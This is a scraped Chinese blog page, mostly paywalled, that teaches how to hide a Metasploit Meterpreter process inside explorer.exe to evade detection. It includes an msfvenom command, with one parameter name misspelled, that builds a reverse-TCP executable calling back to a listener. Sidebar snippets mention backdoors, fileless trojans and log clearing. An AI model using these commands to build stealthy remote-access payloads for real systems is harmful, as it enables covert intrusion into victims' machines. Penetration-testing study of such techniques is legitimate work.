Metasploit渗透——msfvenom隐藏恶意进程

最新推荐文章于 2024-05-21 09:00:05 发布

Thgilil

最新推荐文章于 2024-05-21 09:00:05 发布

阅读量933

点赞数

分类专栏：渗透测试文章标签： windows 网络安全

本文链接：https://blog.csdn.net/negnegil/article/details/120313686

版权

本文介绍了两种方法将Meterpreter进程隐藏在目标系统的合法进程中，以避免防御设备检测。首先，通过msfvenom生成的可执行文件使用PrependMigrate参数结合exploit/multi/handler进行监听，将恶意进程附着在explorer.exe中。其次，利用Msfconsole创建隐藏二进制文件，同样实现进程迁移。这两种方法能有效隐蔽恶意活动，提高攻击的隐蔽性。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

我们上传了msf马后并不是万无一失的，msf马创建的进程极有可能被防御设备发现，发出警报并采取措施终止进程，我们的会话也会被终止。因此，我们有必要将创建的msf马进程迁移到目标及正在运行的进程中，这样受害者就无法找到恶意进程，从而定位到恶意软件的位置了。

第一种方法

通过使用 PrependMigrate参数使生成的可执行文件隐藏在名为explorer.exe的进程后面。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=4444 prpendmigrateprocess=explorer.exe prependmigrate=true -f exe > shell.exe

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Thgilil

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Metasploit 渗透测试之制作隐藏后门

weixin_46035615的博客

05-01

2977

1. 实战-使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透 2. 实战-Linux 无文件木马程序 3. 实战-使用脚本来进行自动创建后门 4. 系统日志清理

利用metasploit渗透测试制作隐藏后门

wr456wr的博客

03-12

772

利用metasploit渗透测试制作隐藏后门 @目录 1. 使用ms17-010永恒之蓝漏洞对win7进行渗透 2. 制作linux无文件木马程序 3. 使用脚本来进行自动创建后门使用ms17-010永恒之蓝漏洞对win7进行渗透已知win7ip：192.168.47.129 使用nmap对其进行开放端口探测在kali端使用msf加载辅助模块探测目标机是否存在ms17-010漏洞 [+] 192.168.47.129:445 - Host is likely VULNERABLE t

1 条评论您还未登录，请先登录后发表或查看评论

MSF&CobaltStrik流量隐藏

qq_45434762的博客

12-05

1481

本文内容涉及程序/技术原理可能带有攻击性，仅用于安全研究和教学使用，务必在模拟环境下进行实验，请勿将其用于其他用途。因此造成的后果自行承担，如有违反国家法律则自行承担全部法律责任，与作者及...

远控免杀专题2---msfvenom的隐藏参数

qq_41683305的博客

03-09

850

0x01 msfvenom简介 msfvenom是msfpayload和msfencode的结合体，与2015年6月8日取代了msfpayload和msfencode。在此之后，metasploit-framwork下面的msfpayload（载荷生成器），msfencoder（编码器），msfcli（监听接口）都不在被支持 0x02 常规参数输入msfvenom可以查看所以的指令 -p,-p...

利用Windows进程隐藏进行权限维持

Karka_的博客

12-31

2487

进程（Process）是计算机中的程序关于某数据集合上的一次运行活动，是系统进行资源分配和调度的基本单位，是结构的基础。在早期面向进程设计的计算机结构中，进程是程序的基本执行实体；在当代面向线程设计的计算机结构中，进程是线程的容器。程序是指令、数据及其组织形式的描述，进程是程序的实体。我们在计算机上的每个程序运行起来之后都可以被称作进程，进程可以在任务管理器里面看见，如下所示。

Kali linux 学习笔记（九十六）metasploit framework——客户端渗透 2020.4.28

闵行小鱼塘

04-28

929

本节学习客户端渗透

Kali linux 学习笔记（九十九）metasploit framework——后渗透阶段（三） 2020.4.30

闵行小鱼塘

04-30

722

在获取shell后，需要扩大战果，提权，信息收集，渗透内网，永久后门

信息系统安全——基于 KALI 和 Metasploit 的渗透测试

cc123489ll的博客

04-26

1006

实验 2 基于 KALI 和 Metasploit 的渗透测试2.1 实验名称《基于 KALI 和 Metasploit 的渗透测试》2.2 实验目的1 、熟悉渗透测试方法2 、熟悉渗透测试工具 Kali 及 Metasploit 的使用2.3 实验步骤及内容**** 、安装系统**** 、选择**** 中种攻击工具，记录攻击的主要步骤和攻击结果截图。攻击一：使用复现“永恒之蓝”漏洞实验环境：Win7（关闭防火墙，开启 SMB 服务）；1 启动 Metasploit。

MSF实战-制作隐藏后门

L120305q的博客

04-13

262

MSF实战笔记

Linux安全深度剖析：隐藏木马进程与痕迹清理技术指南

最新发布

weixin_43822401的博客

05-21

1293

通过上述步骤，你可以在Linux系统中隐藏木马程序进程，使其在常规的进程查看工具中不可见。这种技术在渗透测试中非常有用，但也可能被用于恶意目的，因此使用时需要严格遵守法律和道德规范。

使用msfvenom生成木马用于监听别人的操作

Unitue_逆流

03-20

1万+

msfvenom Options: -p, –payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload，请使用& #039;-& #039;或者stdin指定 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n,

msfvenom生成木马的简单利用

dodod2012的专栏

07-15

4888

1、简介本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件，用kali监听，靶机win10运行木马程序，实现控制靶机win10。 2、实验环境 1、一台kali虚拟机 ip为192.168.110.140 2、一台win10虚拟机 3、实验步骤 1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lport.

Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用

Alone hackers的博客

03-06

5816

Metasploit (MSF) 使用:包含基本使用，payload生成，后渗透模块使用。

全网最全的Cobalt Strike使用教程-进阶篇

喜欢Python编程的程序员柚柚呀

08-17

1万+

在这篇文章中，斗哥将详细介绍一下Cobalt Strike的各个模块是干什么的以及部分模块的具体使用方式。

MSF编码+VS编译木马免杀

向阳-Y.的博客

03-16

2545

木马免杀

Metasploit 整理笔记

不急不躁

07-12

1万+

一．名词解释 exploit 测试者利用它来攻击一个系统，程序，或服务，以获得开发者意料之外的结果。常见的有内存溢出，网站程序漏洞利用，配置错误exploit。 payload 我们想让被攻击系统执行的程序，如reverse shell 可以从目标机器与测试者之间建立一个反响连接，bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只能在目标机器上

Msfvenom的简单用法